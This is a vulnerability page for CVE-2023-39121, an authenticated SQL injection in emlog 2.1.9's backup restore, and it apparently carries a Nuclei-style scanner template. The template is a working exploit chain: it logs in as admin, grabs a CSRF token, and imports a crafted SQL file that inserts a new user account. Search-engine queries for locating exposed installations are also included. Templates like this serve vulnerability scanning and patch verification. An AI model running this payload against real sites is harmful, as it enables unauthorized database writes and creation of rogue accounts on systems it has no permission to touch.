漏洞描述
emlog v2.1.9 contains a SQL injection caused by unsanitized input in the data backup/restore functionality, allowing attackers to execute arbitrary SQL commands through crafted backup files.
CVE-2023-39121: Emlog 2.1.9 - SQL Injection
PoC代码[已公开]
id: CVE-2023-39121
info:
name: Emlog 2.1.9 - SQL Injection
author: wjch611
severity: high
description: |
emlog v2.1.9 contains a SQL injection caused by unsanitized input in the data backup/restore functionality, allowing attackers to execute arbitrary SQL commands through crafted backup files.
impact: |
Attackers with admin credentials can execute arbitrary SQL commands, potentially leading to privilege escalation, data leakage, modification, or deletion.
remediation: |
Update to the latest version of emlog or apply security patches addressing the SQL injection vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-39121
- https://github.com/safe-b/CVE/issues/1#issue-1817133689
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2023-39121
cwe-id: CWE-89
epss-score: 0.0027
epss-percentile: 0.50244
cpe: cpe:2.3:a:emlog:emlog:2.1.9:-:*:*:*:*:*:*
metadata:
verified: true
max-request: 5
vendor: emlog
product: emlog
shodan-query: http.title:"emlog"
fofa-query: title="emlog"
google-query: intitle:"emlog"
tags: cve2023,cve,sqli,emlog,authenticated
variables:
rand_uid: "{{rand_int(10000, 99999)}}"
rand_marker: "{{rand_int(100000, 999999)}}"
flow: http(1) && http(2) && http(3) && http(4) && http(5)
http:
- raw:
- |
POST /admin/account.php?action=dosignin&s= HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&pw={{password}}
- raw:
- |
GET /admin/data.php HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: token
part: body
group: 1
regex:
- 'name="token" id="token" value="([a-f0-9]{40})"'
internal: true
- raw:
- |
POST /admin/data.php?action=backup HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
token={{token}}
extractors:
- type: dsl
dsl:
- "body"
name: full_response
internal: true
- raw:
- |
POST /admin/data.php?action=import HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUBHhE8PS934oJ2MP
------WebKitFormBoundaryUBHhE8PS934oJ2MP
Content-Disposition: form-data; name="token"
{{token}}
------WebKitFormBoundaryUBHhE8PS934oJ2MP
Content-Disposition: form-data; name="sqlfile"; filename="emlog_test.sql"
Content-Type: application/octet-stream
{{full_response}}
INSERT INTO emlog_user VALUES('{{rand_uid}}','sqli{{rand_marker}}','$P$BnTaZnToynOoAVP6T/MiTsZc9ZAQNg.','test','writer','n','','sqli{{rand_marker}}@test.com','','','0','1687261845','1687261845');
------WebKitFormBoundaryUBHhE8PS934oJ2MP--
- raw:
- |
GET /admin/user.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- contains(body, concat("sqli", rand_marker))
# digest: 4a0a00473045022100a9bce5a068c8b3c69535bf5b3d93d36515e88822bf61b4cfa62b19de79c4993602202bea236b15497ce3ce5ebd6823f64a49b6bb381295579cb9000bb281a4d69936:922c64590222798bb761d5b6d8e72950